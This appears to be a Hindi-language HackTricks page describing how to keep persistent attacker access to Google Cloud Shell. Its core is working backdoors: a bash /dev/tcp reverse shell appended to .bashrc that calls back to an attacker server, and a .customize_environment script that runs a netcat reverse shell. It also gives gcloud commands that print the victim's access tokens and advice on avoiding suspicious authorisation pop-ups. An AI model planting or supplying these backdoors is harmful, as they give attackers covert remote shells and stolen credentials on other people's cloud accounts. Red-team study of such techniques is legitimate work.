GCP - Cloud Shell Persistence

htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें!

हैकट्रिक्स का समर्थन करने के अन्य तरीके:

क्लाउड शैल

अधिक जानकारी के लिए जांचें:

pageGCP - Cloud Shell Enum

स्थायी बैकडोर

Google Cloud Shell आपको ब्राउज़र से सीधे आपके क्लाउड संसाधनों तक कमांड लाइन एक्सेस प्रदान करता है बिना किसी जुड़े लागत के।

आप वेब कॉन्सोल से या gcloud cloud-shell ssh चला कर Google के क्लाउड शैल तक पहुंच सकते हैं।

इस कॉन्सोल में हमलावरों के लिए कुछ दिलचस्प क्षमताएं हैं:

  1. किसी भी Google उपयोगकर्ता को Google Cloud तक पहुंचने की अनुमति होती है, एक पूरी तरह से प्रमाणित क्लाउड शैल इंस्टेंस (सर्विस अकाउंट्स, संगठन के मालिक होने के बावजूद भी) तक पहुंच होती है।

  2. यदि कोई गतिविधि नहीं होती है तो उक्त इंस्टेंस कम से कम 120 दिनों तक अपने होम डायरेक्टरी को बनाए रखेगा

  3. उस इंस्टेंस की गतिविधि का कोई संगठन की निगरानी करने की क्षमता नहीं है।

यह बुनियादी रूप से यह अर्थ करता है कि एक हमलावर उपयोगकर्ता की होम डायरेक्टरी में एक बैकडोर रख सकता है और जब तक उपयोगकर्ता कम से कम 120 दिनों में एक बार GC शैल से कनेक्ट करता है, तो बैकडोर बना रहेगा और हमलावर को हर बार जब भी यह चलाया जाता है, शैल मिलेगा बस इसे करके:

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

होम फ़ोल्डर में एक और फ़ाइल है जिसका नाम है .customize_environment जो, अगर मौजूद है, तो हर बार क्लाउड शैल में उपयोगकर्ता पहुंचता है (पिछली तकनीक में की तरह)। बस पिछले बैकडोर को डालें या निम्नलिखित जैसा एक बैकडोर डालें ताकि उपयोगकर्ता "अक्सर" क्लाउड शैल का उपयोग करता रहे:

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

यह जरूरी है कि ध्यान दें कि पहली बार जब प्रमाणीकरण की आवश्यकता होती है, तो उपयोगकर्ता के ब्राउज़र में एक पॉप-अप अधिकारीकरण विंडो दिखाई देती है। इस विंडो को स्वीकार करना आवश्यक है ताकि कमांड चल सके। अगर अप्रत्याशित पॉप-अप दिखाई देता है, तो यह संदेह उत्पन्न कर सकता है और संभावित रूप से उपयोग किया जा रहा स्थायित्व विधि को क्षति पहुंचा सकता है।

यह उपयोगकर्ता सत्र में देखा गया है कि ब्राउज़र से gcloud projects list को निषेधित करने पर पॉप-अप है (हमलावर के रूप में):

हालांकि, अगर उपयोगकर्ता ने सक्रिय रूप से क्लाउडशेल का उपयोग किया है, तो पॉप-अप नहीं दिखाई देगा और आप उपयोगकर्ता के टोकन इकट्ठा कर सकते हैं:

gcloud auth print-access-token
gcloud auth application-default print-access-token

कैसे SSH कनेक्शन स्थापित होता है

मुख्य रूप से, इन 3 API कॉल का उपयोग किया जाता है:

लेकिन आप https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key में अधिक जानकारी पा सकते हैं।

संदर्भ

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated